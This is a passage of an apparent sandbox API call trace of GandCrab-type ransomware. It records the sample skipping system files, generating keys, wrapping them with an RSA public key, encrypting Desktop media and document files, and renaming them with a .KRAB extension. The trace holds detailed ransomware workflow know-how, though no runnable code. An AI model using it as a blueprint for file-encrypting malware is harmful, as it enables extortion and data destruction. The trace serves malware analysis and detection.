(lpString1="Rr9S3tnzL.m4a", lpString2="iconcache.db") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="bootsect.bak") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="boot.ini") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="ntuser.dat.log") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="thumbs.db") returned -1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="ntldr") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="NTDETECT.COM") returned 1 [0088.002] lstrcmpiW (lpString1="Rr9S3tnzL.m4a", lpString2="Bootfont.bin") returned 1 [0088.002] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.003] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010b50) returned 1 [0088.004] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.005] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.005] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.005] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.005] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0088.005] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.005] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010ce8) returned 1 [0088.012] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.012] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.013] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.013] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.013] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.013] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.013] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0088.015] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023338) returned 1 [0088.015] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.015] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.015] GetLastError () returned 0x0 [0088.015] CryptDestroyKey (hKey=0x1023338) returned 1 [0088.015] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0088.016] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.017] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10231f8) returned 1 [0088.017] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.017] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.017] GetLastError () returned 0x0 [0088.017] CryptDestroyKey (hKey=0x10231f8) returned 1 [0088.017] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.018] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rr9s3tnzl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.018] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.018] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.019] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x15c84, lpOverlapped=0x0) returned 1 [0088.116] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffea37c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.116] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15c84, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x15c84, lpOverlapped=0x0) returned 1 [0088.117] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.117] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.121] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.122] CloseHandle (hObject=0x434) returned 1 [0088.122] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.122] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rr9s3tnzl.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Rr9S3tnzL.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\rr9s3tnzl.m4a.krab")) returned 1 [0088.123] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.124] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.124] lstrcmpW (lpString1="SuKCXgG.m4a", lpString2=".") returned 1 [0088.124] lstrcmpW (lpString1="SuKCXgG.m4a", lpString2="..") returned 1 [0088.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="SuKCXgG.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a" [0088.124] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.127] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a.KRAB") returned 46 [0088.127] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a") returned 41 [0088.127] lstrlenW (lpString=".m4a") returned 4 [0088.127] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.127] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0088.127] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.128] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a") returned 41 [0088.128] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a") returned 41 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="desktop.ini") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="autorun.inf") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="ntuser.dat") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="iconcache.db") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="bootsect.bak") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="boot.ini") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="ntuser.dat.log") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="thumbs.db") returned -1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="ntldr") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="NTDETECT.COM") returned 1 [0088.128] lstrcmpiW (lpString1="SuKCXgG.m4a", lpString2="Bootfont.bin") returned 1 [0088.128] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.129] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010820) returned 1 [0088.130] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.131] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.131] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.131] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.131] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0088.131] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.131] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010930) returned 1 [0088.133] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.134] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.134] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.134] CryptGenRandom (in: hProv=0x1010930, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.134] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0088.134] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.134] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.136] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0088.136] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.136] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.136] GetLastError () returned 0x0 [0088.136] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.137] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.137] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011458) returned 1 [0088.140] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023238) returned 1 [0088.141] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.141] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.141] GetLastError () returned 0x0 [0088.141] CryptDestroyKey (hKey=0x1023238) returned 1 [0088.141] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0088.141] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sukcxgg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.142] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.142] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.142] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x4556, lpOverlapped=0x0) returned 1 [0088.157] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffbaaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.157] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4556, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x4556, lpOverlapped=0x0) returned 1 [0088.157] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.157] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.161] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.161] CloseHandle (hObject=0x434) returned 1 [0088.162] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.162] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sukcxgg.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\SuKCXgG.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\sukcxgg.m4a.krab")) returned 1 [0088.163] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.163] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.163] lstrcmpW (lpString1="tl4Q_4 XmdVB.mp4", lpString2=".") returned 1 [0088.163] lstrcmpW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="..") returned 1 [0088.163] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="tl4Q_4 XmdVB.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4" [0088.163] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.164] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4.KRAB") returned 51 [0088.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4") returned 46 [0088.164] lstrlenW (lpString=".mp4") returned 4 [0088.164] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.164] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0088.164] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4") returned 46 [0088.164] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4") returned 46 [0088.164] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="desktop.ini") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="autorun.inf") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="ntuser.dat") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="iconcache.db") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="bootsect.bak") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="boot.ini") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="ntuser.dat.log") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="thumbs.db") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="ntldr") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="NTDETECT.COM") returned 1 [0088.165] lstrcmpiW (lpString1="tl4Q_4 XmdVB.mp4", lpString2="Bootfont.bin") returned 1 [0088.165] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.165] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010ce8) returned 1 [0088.167] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.167] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.168] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.168] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.168] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.168] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.170] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.172] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.173] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.173] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.173] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.173] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.173] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10113d0) returned 1 [0088.175] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0088.175] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.175] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.175] GetLastError () returned 0x0 [0088.175] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0088.175] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0088.175] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0088.177] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0088.177] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.177] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.177] GetLastError () returned 0x0 [0088.177] CryptDestroyKey (hKey=0x10235f8) returned 1 [0088.177] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.178] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\tl4q_4 xmdvb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.178] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.178] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.179] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x69d4, lpOverlapped=0x0) returned 1 [0088.202] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff962c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.202] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x69d4, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x69d4, lpOverlapped=0x0) returned 1 [0088.203] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.203] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.208] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.208] CloseHandle (hObject=0x434) returned 1 [0088.208] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.208] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\tl4q_4 xmdvb.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\tl4Q_4 XmdVB.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\tl4q_4 xmdvb.mp4.krab")) returned 1 [0088.209] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.209] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.210] lstrcmpW (lpString1="uD7dua.pptx", lpString2=".") returned 1 [0088.210] lstrcmpW (lpString1="uD7dua.pptx", lpString2="..") returned 1 [0088.210] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="uD7dua.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx" [0088.210] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.210] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx.KRAB") returned 46 [0088.210] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx") returned 41 [0088.210] lstrlenW (lpString=".pptx") returned 5 [0088.210] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.210] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0088.211] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx") returned 41 [0088.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\uD7dua.pptx") returned 41 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="desktop.ini") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="autorun.inf") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="ntuser.dat") returned 1 [0088.211] lstrcmpiW (lpString1="uD7dua.pptx", lpString2="iconcache.db") returned 1 